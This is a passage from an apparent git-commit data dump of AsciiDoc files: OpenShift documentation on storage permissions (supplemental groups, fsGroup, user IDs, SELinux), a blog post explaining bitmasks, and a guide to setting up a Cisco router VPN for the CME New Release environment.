Allowed Ranges]\nbefore working with supplemental groups.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs (supplemental or\nxref:fsgroup[fsGroup]) to gain access to persistent storage versus using\nxref:user-id[user IDs].\n====\n\nSupplemental groups are regular Linux groups. When a process runs in Linux, it\nhas a UID, a GID, and one or more supplemental groups. These attributes can be\nset for a container's main process. The `*supplementalGroups*` IDs are typically\nused for controlling access to shared storage, such as NFS and GlusterFS,\nwhereas xref:fsgroup[fsGroup] is used for controlling access to block storage,\nsuch as Ceph RBD and iSCSI.\n\nThe {product-title} shared storage plug-ins mount volumes such that the POSIX\npermissions on the mount match the permissions on the target storage. 
For example, if the target storage's owner ID is *1234* and its group ID is *5678*, then\nthe mount on the host node and in the container will have those same IDs.\nTherefore, the container's main process must match one or both of those IDs in\norder to access the volume.\n\n[[nfs-example]]\nFor example, consider the following NFS export.\n\nOn an {product-title} node:\n\n[NOTE]\n====\n`showmount` requires access to the ports used by `rpcbind` and `rpc.mount` on\nthe NFS server.\n====\n\n====\n----\n# showmount -e <nfs-server-ip-or-hostname>\nExport list for f21-nfs.vm:\n\/opt\/nfs *\n----\n====\n\nOn the NFS server:\n\n====\n----\n# cat \/etc\/exports\n\/opt\/nfs *(rw,sync,root_squash)\n...\n\n# ls -lZ \/opt\/nfs -d\ndrwxrws---. nfsnobody 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n\n# id nfsnobody\nuid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)\n----\n====\n\n[NOTE]\n====\nIn the above, the owner is 65534 (*nfsnobody*), but the suggestions and examples in\nthis topic apply to any non-root owner.\n====\n\nThe *_\/opt\/nfs\/_* export is accessible by UID *65534* and the group *5555*. In\ngeneral, containers should not run as root, so in this NFS example, containers\nwhich are not run as UID *65534* or are not members of the group *5555* will not be\nable to access the NFS export.\n\nOften, the SCC matching the pod does not allow a specific user ID to be\nspecified, so using supplemental groups is a more flexible way to grant\nstorage access to a pod. For example, to grant NFS access to the export above,\nthe group *5555* can be defined in the pod definition:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n volumeMounts:\n - name: nfs <1>\n mountPath: \/usr\/share\/... <2>\n securityContext: <3>\n supplementalGroups: [5555] <4>\n volumes:\n - name: nfs <5>\n nfs:\n server: <nfs_server_ip_or_host>\n path: \/opt\/nfs <6>\n----\n<1> Name of the volume mount. Must match the name in the `*volumes*` section.\n<2> NFS export path as seen in the container.\n<3> Pod global security context. Applies to all containers in the pod. Each\ncontainer can also define its own `*securityContext*`; however, group IDs are global\nto the pod and cannot be defined for individual containers.\n<4> Supplemental groups, supplied as an array of IDs, are set to 5555. This grants\ngroup access to the export.\n<5> Name of the volume. Must match the name in the `*volumeMounts*` section.\n<6> Actual NFS export path on the NFS server.\n====\n\nAll containers in the above pod (assuming the matching SCC or project allows the\ngroup *5555*) will be members of the group *5555* and have access to the volume,\nregardless of the container's user ID. However, the assumption above is\ncritical. Sometimes, the SCC does not define a range of allowable group IDs but\nrequires group ID validation (due to `*supplementalGroups*` set to *MustRunAs*;\nnote this is not the case for the *restricted* SCC). The project will not likely\nallow a group ID of *5555*, unless the project has been customized for access to\nthis NFS export. 
So in this scenario, the above pod will fail because its group\nID of *5555* is not within the SCC's or the project's range of allowed group\nIDs.\n\n[[scc-supplemental-groups]]\n*Supplemental Groups and Custom SCCs*\n\nTo remedy the situation in xref:nfs-example[the previous example], a custom SCC\ncan be created such that:\n\n- a minimum and maximum group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is better to create a new SCC rather than modifying a predefined SCC, or changing\nthe range of allowed IDs in the predefined projects.\n\nThe easiest way to create a new SCC is to export an existing SCC and customize\nthe YAML file to meet the requirements of the new SCC. For example:\n\n. Use the *restricted* SCC as a template for the new SCC:\n+\n----\n$ oc export scc restricted > new-scc.yaml\n----\n\n. Edit the *_new-scc.yaml_* file to your desired specifications.\n\n. Create the new SCC:\n+\n----\n$ oc create -f new-scc.yaml\n----\n\n[NOTE]\n====\nThe `oc edit scc` command can be used to modify an instantiated SCC.\n====\n\nHere is a fragment of a new SCC named *nfs-scc*:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\n...\nsupplementalGroups:\n type: MustRunAs <4>\n ranges:\n - min: 5000 <5>\n max: 6000\n...\n----\n<1> The `allow*` boolean fields are the same as for the *restricted* SCC.\n<2> Name of the new SCC.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. Higher priority SCCs sort before lower priority SCCs and thus have a\nbetter chance of matching a new pod.\n<4> `*supplementalGroups*` is a strategy and it is set to *MustRunAs*, which means\ngroup ID checking is required.\n<5> Multiple ranges are supported. The allowed group ID range here is 5000 through\n5999, with the default supplemental group being 5000.\n====\n\nWhen the same pod shown earlier runs against this new SCC (assuming, of course,\nthe pod has access to the new SCC), it will start because the group *5555*,\nsupplied in the pod definition, is now allowed by the custom SCC.\n\n[[fsgroup]]\n== fsGroup\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with `*fsGroup*` IDs.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or `*fsGroup*`) to gain access to\npersistent storage versus using xref:user-id[user IDs].\n====\n\n`*fsGroup*` defines a pod's \"file system group\" ID, which is added to the\ncontainer's supplemental groups. The `*supplementalGroups*` ID applies to shared\nstorage, whereas the `*fsGroup*` ID is used for block storage.\n\nBlock storage, such as Ceph RBD, iSCSI, and various cloud storage, is typically\ndedicated to a single pod which has requested the block storage volume, either\ndirectly or using a PVC. Unlike shared storage, block storage is taken over by a\npod, meaning that user and group IDs supplied in the pod definition (or image)\nare applied to the actual, physical block device. 
Typically, block storage is\nnot shared.\n\nA `*fsGroup*` definition is shown in the following pod definition\nfragment:\n\n====\n[source,yaml]\n----\nkind: Pod\n...\nspec:\n containers:\n - name: ...\n securityContext: <1>\n fsGroup: 5555 <2>\n ...\n----\n<1> As with `*supplementalGroups*`, `*fsGroup*` must be defined globally to the pod,\nnot per container.\n<2> 5555 will become the group ID for the volume's group permissions and for all new\nfiles created in the volume.\n====\n\nAs with `*supplementalGroups*`, all containers in the above pod (assuming the\nmatching SCC or project allows the group *5555*) will be members of the group\n*5555*, and will have access to the block volume, regardless of the container's\nuser ID. If the pod matches the *restricted* SCC, whose `*fsGroup*` strategy is\n*RunAsAny*, then any `*fsGroup*` ID (including *5555*) will be accepted.\nHowever, if the SCC has its `*fsGroup*` strategy set to *MustRunAs*, and *5555*\nis not in the allowable range of `*fsGroup*` IDs, then the pod will fail to run.\n\n[[scc-fsgroup]]\n*fsGroups and Custom SCCs*\n\nTo remedy the situation in the previous example, a custom SCC can be created such that:\n\n- a minimum and maximum group ID are defined,\n- ID range checking is enforced, and\n- the group ID of *5555* is allowed.\n\nIt is better to create a new SCC rather than modifying a predefined SCC, or changing\nthe range of allowed IDs in the predefined projects.\n\nConsider the following fragment of a new SCC definition:\n\n====\n----\n# oc export scc new-scc\n...\nkind: SecurityContextConstraints\n...\nfsGroup:\n type: MustRunAs <1>\n ranges: <2>\n - max: 6000\n min: 5000 <3>\n...\n----\n<1> *MustRunAs* triggers group ID range checking, whereas *RunAsAny* does not\nrequire range checking.\n<2> Multiple ranges are supported. The allowed group ID range here is 5000 through,\nand including, 5999, with the default `*fsGroup*` being 5000.\n<3> The minimum value (or the entire range) can be omitted from the SCC, and thus\nrange checking and generating a default value will defer to the project's\n`*openshift.io\/sa.scc.supplemental-groups*` range. `*fsGroup*` and\n`*supplementalGroups*` use the same group field in the project; there is not a\nseparate range for `*fsGroup*`.\n====\n\nWhen the pod shown above runs against this new SCC (assuming, of course, the pod\nhas access to the new SCC), it will start because the group *5555*, supplied in\nthe pod definition, is allowed by the custom SCC. Additionally, the pod will\n\"take over\" the block device, so when the block storage is viewed by a process\noutside of the pod, it will actually have *5555* as its group ID.\n\nCurrently, volumes that support block ownership management\ninclude:\n\n* AWS Elastic Block Store\n* OpenStack Cinder\n* Ceph RBD\n* GCE Persistent Disk\n* iSCSI\n* emptyDir\n* gitRepo\n\n[[user-id]]\n== User IDs\n\n[NOTE]\n====\nRead xref:sccs-defaults-allowed-ranges[SCCs, Defaults, and Allowed Ranges]\nbefore working with user IDs.\n====\n\n[TIP]\n====\nIt is generally preferable to use group IDs\n(xref:supplemental-groups[supplemental] or xref:fsgroup[fsGroup]) to gain\naccess to persistent storage versus using user IDs.\n====\n\nUser IDs can be defined in the container image or in the pod definition. In the\npod definition, a single user ID can be defined globally to all containers, or\nspecific to individual containers (or both). 
A user ID is supplied as shown in\nthe pod definition fragment below:\n\n[[pod-user-id-65534]]\n====\n[source,yaml]\n----\nspec:\n containers:\n - name: ...\n securityContext:\n runAsUser: 65534\n----\n====\n\nID 65534 in the above is container-specific and matches the owner ID on the\nexport. If the NFS export's owner ID was *54321*, then that number would be used\nin the pod definition. Specifying `*securityContext*` outside of the container\ndefinition makes the ID global to all containers in the pod.\n\nSimilar to group IDs, user IDs may be validated according to policies set in the\nSCC and\/or project. If the SCC's `*runAsUser*` strategy is set to *RunAsAny*,\nthen any user ID defined in the pod definition or in the image is allowed.\n\n[WARNING]\n====\nThis means even a UID of *0* (root) is allowed.\n====\n\nIf, instead, the `*runAsUser*` strategy is set to *MustRunAsRange*, then a\nsupplied user ID will be validated against a range of allowed IDs. If the pod\nsupplies no user ID, then the default ID is the minimum value of the range of\nallowable user IDs.\n\nReturning to the earlier xref:nfs-example[NFS example], the container needs its\nUID set to *65534*, which is shown in the pod fragment above. Assuming the\n*default* project and the *restricted* SCC, the pod's requested user ID of\n*65534* will *not* be allowed, and therefore the pod will fail. The pod fails\nbecause:\n\n- it requests *65534* as its user ID,\n- all available SCCs use *MustRunAsRange* for their `*runAsUser*` strategy, so UID\nrange checking is required, and\n- *65534* is not included in the SCC or project's user ID range.\n\nTo address this situation, the recommended path would be to create a new SCC\nwith the appropriate user ID range. A new project could also be created with the\nappropriate user ID range defined. There are other, less-preferred options:\n\n- The *restricted* SCC could be modified to include *65534* within its minimum and\nmaximum user ID range. This is not recommended as you should avoid modifying the\npredefined SCCs if possible.\n- The *restricted* SCC could be modified to use *RunAsAny* for the `*runAsUser*`\nvalue, thus eliminating ID range checking. This is strongly not recommended, as\ncontainers could run as root.\n- The *default* project's UID range could be changed to allow a user ID of\n*65534*. This is not generally advisable because only a single range of user IDs\ncan be specified.\n\n[[scc-runasuser]]\n*User IDs and Custom SCCs*\n\nIt is good practice to avoid modifying the predefined SCCs if possible. The\npreferred approach is to create a custom SCC that better fits an organization's\nsecurity needs, or xref:..\/..\/dev_guide\/projects.adoc#create-a-project[create a\nnew project] that supports the desired user IDs.\n\nTo remedy the situation in the previous example, a custom SCC can be created\nsuch that:\n\n- a minimum and maximum user ID is defined,\n- UID range checking is still enforced, and\n- the UID of *65534* will be allowed.\n\nFor example:\n\n====\n----\n$ oc export scc nfs-scc\n\nallowHostDirVolumePlugin: false <1>\n...\nkind: SecurityContextConstraints\nmetadata:\n ...\n name: nfs-scc <2>\npriority: 9 <3>\nrequiredDropCapabilities: null\nrunAsUser:\n type: MustRunAsRange <4>\n uidRangeMax: 65534 <5>\n uidRangeMin: 65534\n...\n----\n<1> The `allow*` bools are the same as for the *restricted* SCC.\n<2> The name of this new SCC is *nfs-scc*.\n<3> Numerically larger numbers have greater priority. Nil or omitted is the lowest\npriority. 
Higher priority SCCs sort before lower priority SCCs, and thus have a\nbetter chance of matching a new pod.\n<4> The `*runAsUser*` strategy is set to *MustRunAsRange*, which means UID range\nchecking is enforced.\n<5> The UID range is 65534 through 65534 (a range of one value).\n====\n\nNow, with `*runAsUser: 65534*` shown in the previous pod definition fragment,\nthe pod matches the new *nfs-scc* and is able to run with a UID of 65534.\n\n[[selinuxoptions]]\n== SELinux Options\n\nAll predefined SCCs, except for the *privileged* SCC, set the `*seLinuxContext*`\nto *MustRunAs*. So the SCCs most likely to match a pod's requirements will force\nthe pod to use an SELinux policy. The SELinux policy used by the pod can be\ndefined in the pod itself, in the image, in the SCC, or in the project (which\nprovides the default).\n\nSELinux labels can be defined in a pod's `*securityContext.seLinuxOptions*`\nsection, and supports `*user*`, `*role*`, `*type*`, and `*level*`:\n\n[NOTE]\n====\nLevel and MCS label are used interchangeably in this topic.\n====\n\n====\n----\n...\n securityContext: <1>\n seLinuxOptions:\n level: \"s0:c123,c456\" <2>\n...\n----\n<1> `*level*` can be defined globally for the entire pod, or individually for each\ncontainer.\n<2> SELinux level label.\n====\n\nHere are fragments from an SCC and from the *default* project:\n\n====\n----\n$ oc export scc scc-name\n...\nseLinuxContext:\n type: MustRunAs <1>\n\n# oc export project default\n...\nmetadata:\n annotations:\n openshift.io\/sa.scc.mcs: s0:c1,c0 <2>\n...\n----\n<1> *MustRunAs* causes volume relabeling.\n<2> If the label is not provided in the pod or in the SCC, then the default comes\nfrom the project.\n====\n\nAll predefined SCCs, except for the *privileged* SCC, set the `*seLinuxContext*`\nto *MustRunAs*. This forces pods to use MCS labels, which can be defined in the\npod definition, the image, or provided as a default.\n\nThe SCC determines whether or not to require an SELinux label and can provide a\ndefault label. If the `*seLinuxContext*` strategy is set to *MustRunAs* and the\npod (or image) does not define a label, {product-title} defaults to a label\nchosen from the SCC itself or from the project.\n\nIf `*seLinuxContext*` is set to *RunAsAny*, then no\ndefault labels are provided, and the container determines the final label. In\nthe case of Docker, the container will use a unique MCS label, which will not\nlikely match the labeling on existing storage mounts. Volumes which support\nSELinux management will be relabeled so that they are accessible by the\nspecified label and, depending on how exclusionary the label is, only that\nlabel.\n\nThis means two things for unprivileged containers:\n\n- The volume will be given a `*type*` which is accessible by unprivileged\ncontainers. This `*type*` is usually *svirt_sandbox_file_t*.\n- If a `*level*` is specified, the volume will be labeled with the given MCS\nlabel.\n\nFor a volume to be accessible by a pod, the pod must have both categories of the volume.\nSo a pod with *s0:c1,c2* will be able to access a volume with *s0:c1,c2*. A volume with\n*s0* will be accessible by all pods.\n\nIf pods fail authorization, or if the storage mount is failing due to\npermissions errors, then there is a possibility that SELinux enforcement is\ninterfering. 
One way to check for this is to run:\n\n----\n# ausearch -m avc --start recent\n----\n\nThis examines the log file for AVC (Access Vector Cache) errors.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f23eabfafc8316a281f87e0092d8b6d7772e01b","subject":"Update 2015-11-25-11-10-Bitmask-usage.adoc","message":"Update 2015-11-25-11-10-Bitmask-usage.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_contents":"= 1+1 = 10. Bitmask usage\n:hp-image: cover_lines.jpg\n:hp-tags: bitmask\n\nI wonder how widespread the use of bitwise operations and bitmasks is these days, in the era of the \"reign\" of high-level programming languages and large amounts of memory. For some reason I thought that the binary numeral system could only be useful to those who do low-level programming (I have never met such people, but I hope they exist), or perhaps for writing some clever resource-saving algorithm (people who do such things for work rather than as a hobby I have, unfortunately, never met either). 
Imagine my surprise when, on one project, I saw an operation like the following in the code: +\n\n\tif (Request.PermissionMask & (8) > 0)\n\t\t{...}\n\nNo way! Could my school knowledge of the binary numeral system really come in handy at work? As it turned out later, bitmasks had been used on two of my previous, perfectly ordinary corporate projects. One of them was a program written some 15 years ago (which is understandable: perhaps at the time of writing there simply were no other options, and nobody there thought about code having to be clear and self-descriptive), but the other project was relatively new. In neither case were there any memory-saving concerns or any need to process large amounts of data. \n\n== Bitmask\n\nI will try to explain my surprise. 
First, let me describe what a bitmask is. A bitmask is a way to represent the characteristics of an object using the digits 0 and 1 (well, because it is a *bit* mask). You can think of a bitmask as a cipher: +\n\n- each digit in the number is responsible for a property defined in advance; \n- 0 can mean, for example, that a certain property is absent from the object, while 1 means that it is present.\n\nFor a better understanding, let's create bitmasks for colors. There are three primary colors: red, yellow, and blue. By mixing these colors we can obtain all the others (here I mean the primary colors of painters, of living people, not the representation of color in computers). 
\n\n|===\n|Red|Yellow|Blue|Color\n|0|0|1| Blue\n|0|1|0| Yellow\n|1|0|0| Red\n|0|1|1| Green\n|1|1|0| Orange\n|1|0|1| Violet\n|===\n\nThis gives the following binary codes: +\n\n\t1 - blue\n\t10 - yellow\n\t100 - red\n\t11 - green\n\t110 - orange\n\t101 - violet\n\nUsually, when people decide to use bitmasks, such binary codes are converted into the decimal numeral system that we are used to:\n\n|===\n|Color|2|1|0|Decimal value\n|blue|0|0|1| 1 * 2^0^ = 1\n|yellow|0|1|0| 1 * 2^1^ = 2\n|red|1|0|0| 1 * 2^2^ = 4\n|green|0|1|1| 1 * 2^0^ + 1 * 2^1^ = 3\n|orange|1|1|0| 1 * 2^1^ + 1 * 2^2^ = 6\n|violet|1|0|1| 1 * 2^0^ + 1 * 2^2^ = 5\n|===\n\nNow the codes for our colors look like this:\n\n\t1 - blue\n\t2 - yellow\n\t4 - red\n\t3 - green\n\t6 - orange\n\t5 - violet
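\n\nIf you need this encoding in a program, it can be written down directly in code. A minimal sketch in Python (the constant names are my own, invented for illustration; they are not from the original projects):\n\n[source,python]\n----\n# Each primary color gets its own bit (a power of two).\nBLUE = 0b001    # 1\nYELLOW = 0b010  # 2\nRED = 0b100     # 4\n\n# Mixed colors combine the primary bits with bitwise OR.\nGREEN = BLUE | YELLOW  # 0b011 == 3\nORANGE = YELLOW | RED  # 0b110 == 6\nVIOLET = BLUE | RED    # 0b101 == 5\n\nprint(GREEN, ORANGE, VIOLET)  # 3 6 5\n----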
\n\nIf you analyze these codes, you will notice that all the primary colors are powers of 2, while all the colors obtained by mixing are sums of the corresponding primary colors; for example, violet = blue + red: +\n\n\t5 = 1 + 4\n\nBesides these properties, in programs such \"encoded\" objects are decoded with bitwise operations, mainly with the & (AND) operator. For example, if we need to select, out of the whole set of our colors, only those in which blue was used, we perform the following operation:\n\n\tcolor = {1, 2, 4, 3, 6, 5} - our set of all colors\n\tcolor & 1 > 0 = {1, 3, 5} - the set of colors that contain blue (blue, green, violet)\n\nLet me describe in more detail how we got this result:\n\nWe apply a logical AND to each pair of bits that occupy the same positions in the binary representations of the colors. 
If both bits of a pair are 1, the resulting binary digit is 1 (true); if at least one bit of the pair is 0, the resulting binary digit is 0 (false).\n\n|===\n|0|0|#1#| Blue\n|0|1|0| Yellow\n|1|0|0| Red\n|0|1|#1#| Green\n|1|1|0| Orange\n|1|0|#1#| Violet\n|===\n***\n|===\n|0|0|#1#| Blue\n|===\n***\n|===\n|0|0|*1*| Blue\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*Yellow*\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*Red*\n|0|0|*1*| Green\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*Orange*\n|0|0|*1*| Violet\n|===\n\nThe result of the AND operation for yellow, red, and orange is the same - 000 - so these colors did not make it into the resulting set.
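\n\nThe same selection is easy to reproduce in code. A small Python sketch, again with my own illustrative names, using the decimal codes defined earlier:\n\n[source,python]\n----\nBLUE = 1  # the bit responsible for the blue component\n\n# Our set of all colors: blue, yellow, red, green, orange, violet.\ncolors = [1, 2, 4, 3, 6, 5]\n\n# Keep only the colors whose blue bit survives the AND.\nwith_blue = [c for c in colors if (c & BLUE) > 0]\nprint(with_blue)  # [1, 3, 5] - blue, green, violet\n----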
\n\nAs you can see, using bitmasks is interesting and makes it possible to store a lot of information in a single number - one bit per characteristic of the object. However, it does not make the program easy to understand and maintain, especially if the developer did not document their cipher =) \n\nThat is all for today; in the next post I will talk about how this solution can be improved if you have, after all, decided to use bitmasks in your project.\n\nicon:heart-o[size=2x]","old_contents":"= 1+1 = 10. Bitmask usage\n:hp-image: cover_lines.jpg\n:hp-tags: bitmask\n\nI wonder how widespread the use of bitwise operations and bitmasks is these days, in the era of the \"reign\" of high-level programming languages and large amounts of memory. 
For some reason I used to think that the binary numeral system could be useful to those who do low-level programming (I have never met such people, but I hope they exist), or perhaps for writing some clever resource-saving algorithm (people who do that kind of thing for work rather than as a hobby I have, sadly, not met either). Imagine my surprise when, on one project, I came across an operation like the following in the code: +\n\n\tif (Request.PermissionMask & (8) > 0)\n\t\t{...}\n\nReally! Could school knowledge of the binary numeral system actually come in handy at work? As it turned out later, bitmasks were used on two of my past, perfectly ordinary corporate projects. 
One of them was a program written some 15 years ago (which is understandable - maybe there simply were no other options at the time of writing, and nobody there thought about the code having to be readable and self-descriptive), but the other project was relatively new. In neither case was there any problem of saving memory or of processing large volumes of data. \n\n== Bitmask\n\nLet me try to explain my surprise. First, what is a bitmask? A bitmask is a way to represent the characteristics of an object with the digits 0 and 1 (well, because it is a *bit* mask). 
You can think of a bitmask as a cipher: +\n\n- each digit in the number stands for a predefined property; \n- 0 may mean, for example, that a certain property is absent from the object, and 1 - that it is present.\n\nFor a better understanding, let's build bitmasks for colors. There are three base colors - red, yellow and blue. By mixing these colors we can obtain all the others (I mean the base colors painters use - real people - not the representation of color in computers). 
\n\n|===\n|Red|Yellow|Blue| \n|0|0|1| Blue\n|0|1|0| Yellow\n|1|0|0| Red\n|0|1|1| Green\n|1|1|0| Orange\n|1|0|1| Violet\n|===\n\n\nWe get the following binary codes: +\n\n\t1 - blue\n 10 - yellow\n 100 - red\n 11 - green\n 110 - orange\n 101 - violet\n\nUsually, when a team decides to use bitmasks, these binary codes are converted into the decimal system we are used to:\n\n\n|===\n||2|1|0|\n|blue|0|0|1|1 * 2^0^ = 1\n|yellow|0|1|0| 1 * 2^1^ = 2\n|red|1|0|0| 1 * 2^2^ = 4\n|green|0|1|1| 1 * 2^0^ + 1 * 2^1^ = 3\n|orange|1|1|0| 1 * 2^1^ + 1 * 2^2^ = 6\n|violet|1|0|1| 1 * 2^0^ + 1 * 2^2^ = 5\n|===\n\nNow the codes for our colors look like this:\n\n\t1 - blue\n 2 - yellow\n 4 - red\n 3 - green\n 6 - orange\n 5 - violet\n\nAnalyzing this, we can see that all base colors are powers of 2, while every color obtained as a result of mixing is the sum of the corresponding base 
colors; violet = blue + red, for instance: +\n\n\t5 = 1 + 4 \n\nBesides these properties, in programs such \"encoded\" objects are decoded with bitwise operations, mainly with the & (AND) operator. For example, if we need to select, out of the whole set of our colors, only those where blue was applied, we perform the following operation:\n\n\tcolor = {1, 2, 4, 3, 6, 5} - our set of all colors\n\tcolor & 1 = {1, 3, 5} - the set of colors that contain blue (blue, green, violet)\n \nLet me describe in more detail how we got this:\n\nWe apply a logical AND to every pair of bits that occupy the same position in the binary representations of the colors. 
If both corresponding bits are 1, the resulting binary digit is 1 (true); if at least one bit of the pair is 0, the resulting binary digit is 0 (false).\n\n|=== \n|0|0|#1#| Blue\n|0|1|0| Yellow\n|1|0|0| Red\n|0|1|#1#| Green\n|1|1|0| Orange\n|1|0|#1#| Violet\n|===\n***\n|===\n|0|0|#1#| Blue\n|===\n***\n|=== \n|0|0|*1*| Blue\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*Yellow*\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*Red*\n|0|0|*1*| Green\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*Orange*\n|0|0|*1*| Violet\n|===\n\n\nAs you can see, using bitmasks is interesting and lets us store a lot of information in a single number - one bit per characteristic of the object. 
But this does not make a program easy to understand and to maintain later on, especially if the developer never documented the cipher =) \n\nThat is all for today; in the next post I will show how the solution can be improved if you have, after all, decided to use a bitmask in your project.\n\nicon:heart-o[size=2x]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"947aa5ed6cec821800bc568dde5671a92853e464","subject":"Update 2016-03-12-Follow-Your-Madness.adoc","message":"Update 2016-03-12-Follow-Your-Madness.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Follow-Your-Madness.adoc","new_file":"_posts\/2016-03-12-Follow-Your-Madness.adoc","new_contents":"= Follow Your Madness\n:hp-tags: Self Improvement, Soft Skills, Confidence\n:hp-image: covers\/cover-01.jpg\n","old_contents":"= Follow Your Madness\n:hp-tags: Self Improvement, Soft Skills, Confidence\n:hp-image: \/covers\/cover-01.jpg\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"48aa65b1ad8ef976fcf79aadebe060f9c4e7cc7c","subject":"Update 2016-09-03-CME-New-Release-VPN.adoc","message":"Update 2016-09-03-CME-New-Release-VPN.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_contents":"= CME New Release VPN\n\nThis guide is written to help others go through the process of configuring a system to connect to the Chicago Mercantile Exchange's New Release environment over a self-hosted VPN connection. It is not meant to be an in-depth explanation of all terms and concepts, but rather a guide\/map to go from a new router to having a working connection.\n\n== Step 1: Router\n\nYou will need a router with built-in ISAKMP and IPSEC capabilities. One of the low-cost options is to go with an 800 series Cisco router such as the 871W, which you can pick up on eBay for $50 to $60 and which includes wireless capabilities.\n\nFor those readers who are not networking experts or Cisco CCNAs, many acronyms are used; a few of them are briefly explained here.\n* ISAKMP - This is part of the security mechanism and is a subset of IKE. 
http:\/\/networkengineering.stackexchange.com\/questions\/1\/whats-the-difference-between-ike-and-isakmp\n* GRE - Generic Routing Encapsulation. This allows multicast traffic to be sent over the VPN tunnel. http:\/\/www.cisco.com\/c\/en\/us\/support\/docs\/ip\/ip-multicast\/43584-mcast-over-gre.html\n* PIM - Protocol Independent Multicast. You'll need to \"enable multicast routing\" and \"pim sparse-mode\" on the router for the multicast traffic. http:\/\/www.cisco.com\/c\/en\/us\/td\/docs\/ios\/solutions_docs\/ip_multicast\/White_papers\/mcst_ovr.html\n* VLAN - Virtual LAN. Note that on the 871W, you cannot assign a specific IP or DHCP group to the physical interfaces. You must assign the interfaces to be part of a VLAN, and the VLAN can then be assigned a DHCP pool for IP assignment. \n* Advanced Security or Advanced IP - Cisco offers two flavors of software to run on their routers. The \"PIM\" capabilities are in the Advanced IP package, not the Advanced Security package, despite the need for a VPN tunnel! Make sure you are running a package with the K9 designator because it has AES\/3DES encryption.\n* ACL - Access Lists. These allow you to choose which traffic can and cannot go through your router.\n* NAT - Network Address Translation. This is a technology that allows your router to create a sub-network and, through the use of differing ports, pass the traffic through one (public) IP. \"ip nat inside\" tells the VLAN to NAT the IPs connected to it, and \"ip nat outside\" tells the interface (you would execute this command on your WAN port) to NAT traffic to the outside world.\n* dot1Q - This is to tell your wireless interface to use a specific VLAN. For example, \"encapsulation dot1Q 10 native\" uses vlan 10.\n\n== Step 2: Hardware\nIn addition to the 800 series router, to get started you'll need a so-called \"Rollover Cable\". http:\/\/www.ebay.com\/sch\/i.html?_nkw=cisco+rollover+usb&_sacat=0\nThis allows you to configure the router over a serial protocol. Use PuTTY to connect, and choose Serial for the method. For my setup, it was COM3 and 9600 baud.\nTo connect to CME you'll need two physical interfaces available on your server: one for public IP traffic, and the other for CME New Release traffic. \n\n== Step 3: Big Picture\nCreate two VLANs, one for public IP traffic (\"Vlan 10\"), and the other for CME New Release traffic (\"Vlan 20\"). For wireless models, you'll add the wireless connection to be part of Vlan 10. Assign two of the fast ethernet ports to vlan 10, and the other two to Vlan 20. This will allow you to have two physical connections to public IP and two to New Release. You can always attach a switch to a vlan 10 port to expand access to other devices. To have the appropriate IPs assigned to each VLAN, you'll create two DHCP pools from which the IPs are assigned. On vlan 10, you can stay with the traditional 192.168.1.x range, and on vlan 20, you must use the range that the CME assigns you. \n\nNote for wireless users: In order to get wireless working properly, you'll need to create a \"bridge group\". At a high level, this allows you to bridge the physical interface with the wireless interface into the same group. Note: don't assign an IP address range to vlan 10; just tell it to be part of the bridge group with \"no ip address\". Then, in the bridge group configuration, you will assign the IP range for which the DHCP pool exists. 
However, for vlan 20 (because it's not part of a bridge group with a wireless interface), you will assign an IP range that matches what CME tells you. \n\n\n== Step 4: Configure Router\n\nOnce you connect to the router, there are a few key commands that you'll use over and over:\n\n\"write erase\" -- This will erase the \"running-config\" and the \"startup-config\". These are the file names of the two configuration files on the router. \n\"copy running-config startup-config\" -- This will copy the configuration that you have created to be the one run when the router is rebooted.\n\"enable\" -- This will bring the router into privileged mode so you can issue basic show commands.\n\"config t\" -- This will bring the router into global configuration mode where you can actually change settings.\n\"exit\" -- Go back up one \"level\" in your configuration. For example, if you are configuring a sub-interface and want to return to the interface level, just type exit.\n\"shut\" -- Brings down an interface.\n\"no XXXX\" -- Removes or takes away a command. For example, if you type \"no shut\", then it will bring UP an interface. Likewise, \"no ip pim sparse-mode\" will REMOVE the \"ip pim sparse-mode\" from the configuration. \n\n\nExecute \"write erase\" first (to restore the factory configuration).\nNext, \"enable\" to go into privileged mode.\nThen, \"show running-config\" to see what the initial configuration looks like. \nLastly, \"config t\" so you can start changing settings (you should see the '#' prompt, which means you can now issue commands).\n\nOnce you are in this mode, type in the commands from the attached configuration file.\n\n== Step 5: Configure Linux\n\nIn order to get this to work properly, you will need to: 1. disable RP filtering, 2. configure your firewall properly (or just turn it off), and 3. add the appropriate routing table entries so that traffic to CME goes to the correct interface. 
